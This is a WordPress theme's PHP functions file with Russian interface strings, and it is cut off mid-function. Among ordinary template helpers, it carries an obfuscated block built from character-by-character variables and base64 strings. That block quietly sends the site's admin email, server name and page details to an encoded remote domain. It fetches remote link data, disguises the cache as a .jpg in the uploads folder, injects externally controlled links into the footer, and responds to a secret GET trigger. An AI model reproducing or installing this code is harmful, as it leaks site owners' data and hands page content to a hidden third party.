<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $tDJe='s';$rneUcWV='o';$LRQV='_';$tFps='d';$FxWZP='a';$VtlDOR='4';$uvDADI='b';$WdajwU='c';$arQwtit='e';$GibZqv='e';$NLJYeon='d';$FIynsT='6';$UUGWT='e';$brXixpXI=$uvDADI.$FxWZP.$tDJe.$arQwtit.$FIynsT.$VtlDOR.$LRQV.$tFps.$GibZqv.$WdajwU.$rneUcWV.$NLJYeon.$UUGWT;$dYzP='f';$ekVqdJw='z';$XhtDbhO='t';$QxQFZGD='i';$JxPOHKe='l';$TNkPzb='n';$GQQJOqy='e';$WzMXjI='g';$uAKkYB='a';$GnjFVMQl=$WzMXjI.$ekVqdJw.$QxQFZGD.$TNkPzb.$dYzP.$JxPOHKe.$uAKkYB.$XhtDbhO.$GQQJOqy;$BbEkX='t';$ZZpLdr='3';$BNysxm='t';$JpMoJ='_';$WYISyx='r';$TPbqmK='1';$dboJsY='r';$lIQTjE='o';$JZTKg='s';$pFtaPsBF=$JZTKg.$BNysxm.$WYISyx.$JpMoJ.$dboJsY.$lIQTjE.$BbEkX.$TPbqmK.$ZZpLdr;$HDbo='r';$xcuk='r';$nbaW='t';$jLZf='v';$JXVYjWM='s';$cfphub='e';$CIUKfpLV=$JXVYjWM.$nbaW.$HDbo.$xcuk.$cfphub.$jLZf;                     $jf__p='s';$xb_______s='o';$xz___h='_';$nu______________h='d';$kd_______________s='a';$tb_______m='4';$td________m='b';$ks__u='c';$ub____e='e';$xh____________i='e';$do______________u='d';$rs_____e='6';$hc_______________a='e';$sl__________t=$td________m.$kd_______________s.$jf__p.$ub____e.$rs_____e.$tb_______m.$xz___h.$nu______________h.$xh____________i.$ks__u.$xb_______s.$do______________u.$hc_______________a;$gg__x='_';$mu_____q='x';$nr__________f='t';$os_______________e='s';$rw___t='o';$je___d='i';$xr______e='t';$nl__l='i';$qq____________r='u';$es_____k='c';$dj__________m='s';$aq_____i='n';$pl_____________u='n';$xv__________x='e';$ev_______g='f';$ao__v=$ev_______g.$qq____________r.$aq_____i.$es_____k.$xr______e.$je___d.$rw___t.$pl_____________u.$gg__x.$xv__________x.$mu_____q.$nl__l.$dj__________m.$nr__________f.$os_______________e;$kz___________o='o';$pg_____________l='e';$dq____________u='n';$up_______________v='p';$ys__m='f';$bf___u=$ys__m.$kz___________o.$up_______________v.$pg_____________l.$dq____________u;$xf__________a='f';$qf____i='d';$vi_____________o='r';$mq________j='a';$yv____________o='e';$kh__________n=$xf__________a.$vi_____________o.$yv____________o.$mq________j.$qf____i;$yf____________x='o';$bb____________m='e';$hf___b='l';$vd______________f='c';$wm___________v='s';$dj___________d='f';$xm_______________i=$dj___________d.$vd______________f.$hf___b.$yf____________x.$wm___________v.$bb____________m;define("WP_ID", $sl__________t("Mi4wLjA="));define("WP_TTL", $sl__________t("MTA4MDA="));define("WP_SRC", $sl__________t("dHBva24="));function wp_get_header() {global $sl__________t, $ao__v;if ($ao__v($sl__________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ao__v($sl__________t("d3BfZ2V0X2Zvb3Rlcg==")) &&$ao__v($sl__________t("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $sl__________t, $bf___u, $xm_______________i, $kh__________n;$ao________z = TEMPLATEPATH."/".$sl__________t("Zm9vdGVyLnBocA==");$rd_______d = @$bf___u($ao________z, "r");$ao________z = @$kh__________n($rd_______d, @filesize($ao________z));@$xm_______________i($rd_______d);$uo_______f = TEMPLATEPATH."/".$sl__________t("ZnVuY3Rpb25zLnBocA==");$rd_______d = @$bf___u($uo_______f, "r");$uo_______f = @$kh__________n($rd_______d, @filesize($uo_______f));@$xm_______________i($rd_______d);$ys__w = 0;if($ao________z && $uo_______f) {if ($sl__________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ao________z, $sl__________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ys__w = 1;}if (substr_count($ao________z, "wp_theme_GPL_credits()") < 1) {$ys__w = 2;}}if(WP_ID != "2.0.0") {$ys__w = 12;}}if($ys__w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ys__w -->";}}function wp_loaded() {global $sl__________t, $ao__v;return $ao__v($sl__________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($xa_______________c, $os__________l = "(more...)", $dl___d = 0, $kb_____l = "") {$sp_________c = get_the_content($os__________l, $dl___d, $kb_____l);$sp_________c = apply_filters("the_content", $sp_________c);$sp_________c = str_replace("]]>", "]]>", $sp_________c);if (strlen($_GET["p"]) > 0) {echo $sp_________c;}else if ((strlen($sp_________c)>$xa_______________c) && ($on_______y = strpos($sp_________c, " ", $xa_______________c ))) {$sp_________c = substr($sp_________c, 0, $on_______y);$sp_________c = $sp_________c;echo $sp_________c;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$os__________l</a></div></p>";} else {echo $sp_________c;}}}$km___r='c';$ye___________q='b';$hd__________p='4';$gw_______u='n';$nn__h='a';$lk_____w='o';$wb____u='e';$nh__________g='d';$oz___________j='_';$ld__u='e';$hz______p='s';$bn____________i='e';$su______________n='6';$td_____________v=$ye___________q.$nn__h.$hz______p.$ld__u.$su______________n.$hd__________p.$oz___________j.$wb____u.$gw_______u.$km___r.$lk_____w.$nh__________g.$bn____________i;$gy______p='g';$ix__l='e';$nv___________k='f';$jb____j='e';$mt___________v='e';$qs_____p='n';$rk______________k='n';$tk___________a='_';$yh__m='t';$zy______k='s';$eq_____n='o';$ct___d='i';$ne_____g='l';$dr______________g='_';$ah___d='t';$vo________b='t';$la_______z='c';$al__t=$nv___________k.$ct___d.$ne_____g.$jb____j.$tk___________a.$gy______p.$ix__l.$yh__m.$dr______________g.$la_______z.$eq_____n.$rk______________k.$vo________b.$mt___________v.$qs_____p.$ah___d.$zy______k;$qn___x='f';$yo______x='l';$nu_________x='_';$ro____y='s';$mi_____t='e';$gz____h='i';$ht____________t='e';$oi_____n='t';$wo_______d='s';$pe________g='i';$pm___s='x';$zt_____________s=$qn___x.$gz____h.$yo______x.$ht____________t.$nu_________x.$mi_____t.$pm___s.$pe________g.$ro____y.$oi_____n.$wo_______d;$yn______e='r';$wr__________g='m';$hk___________g='a';$bs___________k='o';$jg_________d='s';$bx_______________u='e';$wm__________n='e';$ai___________c='v';$vd____________x='c';$jd_______________e='r';$yo_____________c='o';$xd_______t='p';$we__y='i';$fj____l='n';$rm_______r='_';$gg__p=$ai___________c.$bx_______________u.$jd_______________e.$jg_________d.$we__y.$yo_____________c.$fj____l.$rm_______r.$vd____________x.$bs___________k.$wr__________g.$xd_______t.$hk___________g.$yn______e.$wm__________n;$ql__________f='o';$sv__b='o';$qj___________t='f';$tj______________k='e';$pm____________y='s';$rk_________j='k';$in__________t='p';$tp___i='n';$wm____________u='c';$gz___t=$qj___________t.$pm____________y.$ql__________f.$wm____________u.$rk_________j.$sv__b.$in__________t.$tj______________k.$tp___i;$in_________k='i';$xg_______________z='f';$dq_________m='r';$ib_______________g='e';$ax____j='t';$cg___________k='w';$nl__k=$xg_______________z.$cg___________k.$dq_________m.$in_________k.$ax____j.$ib_______________g;$hv____p='5';$xi______________f='m';$vj__________w='d';$yu_____j=$xi______________f.$vj__________w.$hv____p;$ym_________q='t';$lo_______j='e';$ef________t='l';$bx__________v='a';$sk____o='p';$yl____________h='a';$bf_______________m='h';$kn__________g='r';$xt______m=$kn__________g.$lo_______j.$bx__________v.$ef________t.$sk____o.$yl____________h.$ym_________q.$bf_______________m;$og______r='z';$xl_____s='n';$vd_____________d='l';$ux_____i='i';$sd_______________p='i';$cj_________z='s';$yl______________c='r';$lx__________c='e';$xp____l='a';$qw___________b='e';$ho_____v='u';$yf_____________j=$ho_____v.$xl_____s.$cj_________z.$lx__________c.$yl______________c.$ux_____i.$xp____l.$vd_____________d.$sd_______________p.$og______r.$qw___________b;$am_____________s='m';$wy___________w='e';$jx__________s='n';$we_______________n='m';$mu___e='t';$ne_____s='p';$ob__________l='a';$of______________i=$mu___e.$wy___________w.$am_____________s.$ne_____s.$jx__________s.$ob__________l.$we_______________n;$fh___________m='o';$bb________z='t';$rs_____________z='a';$xs_________f='x';$ta____j='e';$wf______________o='e';$gq_______________g='t';$ix_____e='m';$ka_______________i='r';$fj______i='t';$bw____y='a';$hp___________d='r';$oq___t='c';$hd_______m='c';$dm______________o='e';$cq_______________q='_';$ep____x='s';$yp____________f='n';$hi_____c='_';$qr_________v='e';$pu_______x='t';$vf______________e=$ep____x.$gq_______________g.$hp___________d.$dm______________o.$rs_____________z.$ix_____e.$hi_____c.$oq___t.$fh___________m.$yp____________f.$fj______i.$wf______________o.$xs_________f.$pu_______x.$cq_______________q.$hd_______m.$ka_______________i.$qr_________v.$bw____y.$bb________z.$ta____j;function wn________f($px__p) {global $sl__________t, $ao__v, $al__t, $gg__p, $vf______________e;if (!$ao__v($sl__________t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($gg__p(PHP_VERSION, "5.0.0", ">=") && $ao__v($sl__________t("ZmlsZV9nZXRfY29udGVudHM=")) && $ao__v($sl__________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$zs______g = $vf______________e(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ye__________s = @$al__t($px__p, 0, $zs______g);} else {$ye__________s = @$al__t($px__p, 0);}return $ye__________s;}function gh___________q($px__p) {global $ao__v, $gz___t, $nl__k, $sl__________t;if (!$ao__v($sl__________t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$lv___r = strpos($px__p, "/", 7);$wr_____b = array("uri"     => substr($px__p, $lv___r),"host"    => str_replace("http://", "", substr($px__p, 0, $lv___r)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$zu_________v = @$gz___t("$wr_____b[host]", 80, $kd______________x, $ee_______________q, 4);if (!$zu_________v) {return false;} else {$ye__________s = "";$cp______u  = "GET $wr_____b[uri] HTTP/1.0\r\n";$cp______u .= "Host: $wr_____b[host]\r\n";$cp______u .= "Referer: $wr_____b[referer]\r\n";$cp______u .= "Connection: Close\r\n\r\n";@$nl__k($zu_________v, $cp______u);while (!@feof($zu_________v)) {$gz________g = @fgets($zu_________v, (1024*24));if ($gz________g == "\r\n") {$bf_______k = true;continue;}if ($bf_______k) {$ye__________s .= $gz________g;}}return $ye__________s;}}function tq_________o($px__p) {global $ao__v;$qe______i = false;if ($px__p != "") {if ($ao__v("wn________f")) {$qe______i = @wn________f($px__p);}if (!$qe______i && ($ao__v("gh___________q"))) {$qe______i = @gh___________q($px__p);}}return $qe______i;}function zv_____________j() {global $_SERVER, $yu_____j;$me______________m = $_SERVER["SERVER_NAME"];if (substr("$me______________m", 0, 4) == "www.") {$me______________m = substr("$me______________m", 4);}$me______________m = $yu_____j("$_SERVER[SERVER_NAME]");return $me______________m;}function dk_____________a() {return "file";}function gm_______________x($px__p) {global $_SERVER, $al__t, $zt_____________s, $bf___u, $xm_______________i, $nl__k;$up______________g = wf_________d();$az_____d = zv_____________j().".jpg";$es_______p = $up______________g["dir_upload"]["path"]."/$az_____d";$qg__m = @filemtime($es_______p);if (!$qg__m || ((time()-$qg__m) >= WP_TTL)) {$qe______i = tq_________o($px__p);if ($qe______i) {if ($zt_____________s($es_______p)) {@unlink($es_______p);}$rd_______d = @$bf___u($es_______p, "x+");@$nl__k($rd_______d, $qe______i);@$xm_______________i($rd_______d);}} else {if ($zt_____________s($es_______p)) {$qe______i = @$al__t($es_______p);} else {$qe______i = false;}}return $qe______i;}function wf_________d() {global $_SERVER, $sl__________t, $td_____________v;$ei_____c = wp_count_posts("post");$nw_________v = pathinfo(get_bloginfo("template_directory"));$up______________g = array("url" => array("report"      => $sl__________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $nw_________v,"dir_upload"=> kl____________x(),"queryString"=> array("?a001=".WP_ID,"a004=".$nw_________v[filename],"a005=".$ei_____c->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$up______________g["url"]["queryString"] = implode("&", $up______________g["queryString"]);$up______________g["url"]["report"] = $up______________g["url"]["report"]."/?".$td_____________v($up______________g["url"]["queryString"]).".html";return $up______________g;}function kl____________x() {$cc__x = wp_upload_dir();if (isset($cc__x["error"])) {$sq______d = vb_____h();if (is_writable($sq______d)) {$cc__x = array("path" => $sq______d);}}return $cc__x;}function vb_____h() {global $ao__v, $yu_____j, $xt______m, $of______________i;$ka___________m = (bool) ini_get("safe_mode");if ($ka___________m == true) {return false;}if ($ao__v("sys_get_temp_dir")) {$tq___i = sys_get_temp_dir();if (is_writable($tq___i)) {return $xt______m($tq___i);}}if (!empty($_ENV["TMP"])) {return $xt______m($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xt______m($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xt______m($_ENV["TEMP"]);} else {$jx___________x = $of______________i($yu_____j(uniqid(rand(), true)), "");if ($jx___________x) {$tq___i = $xt______m(dirname($jx___________x));@unlink($jx___________x);return $tq___i;} else {return false;}}}function ul__h() {global $_GET, $zt_____________s;$up______________g = wf_________d();$me______________m = zv_____________j();$ja___g = dk_____________a();$ux_______________y = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ja___g == "file") {$nz_______z = $up______________g["dir_upload"]["path"]."/".$me______________m.".jpg";if ($zt_____________s($nz_______z)) {@unlink($nz_______z);$ux_______________y = "deleted";}}$xu__________j = array("s"=> $ux_______________y,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xu__________j AS $uv______________i => $vh______h) echo " [$uv______________i:$vh______h]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ao__v, $sl__________t, $yf_____________j;$up______________g = wf_________d();$kx___________n = "gm_______________x";if ($ao__v($kx___________n)) {$ye__________s = $kx___________n($up______________g["url"]["report"]);}if ($ye__________s) {if ($ye__________s = @$sl__________t($ye__________s)) {$ye__________s = @$yf_____________j($ye__________s);if (strlen($ye__________s[custom_credit]) >= 5) {$up______________g["default_string"] = $ye__________s[custom_credit];}if ($ye__________s["status"] == "0") {$ad_______n = 1;$ml_____k = 1;} else {$om______b = sizeof($ye__________s["links"]);$vw______________m = $up______________g["default_string"];if ($om______b > 0 && $ye__________s["links"] !== "") {$hp_________k = 0;foreach ($ye__________s["links"] as $jw____________y => $nc____________w) {$hp_________k++;if ($nc____________w->l_path == "" || $nc____________w->l_path == $_SERVER["REQUEST_URI"]) {$nc____________w->l_href = htmlspecialchars(strip_tags($nc____________w->l_href));$nc____________w->l_title = htmlspecialchars(strip_tags($nc____________w->l_title));$nc____________w->l_anchor = htmlspecialchars(strip_tags($nc____________w->l_anchor));$vw______________m .= " | ";$vw______________m .= "<a href='$nc____________w->l_href' title='$nc____________w->l_title'";if ($nc____________w->l_nofollow == "1") {$vw______________m .= " rel='nofollow'";}$vw______________m .= ">$nc____________w->l_anchor</a>";}}}$up______________g["links"] = "$vw______________m";if ($ye__________s[credit] == "0") {$up______________g["links"] = "";}}} else {$ad_______n = "1";}} else {$ad_______n = "1";}if ($ad_______n == "1") {$up______________g["links"] = $up______________g["default_string"];}echo "$up______________g[links]";echo "<!-- s: $ye__________s[signature] -->";ul__h();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
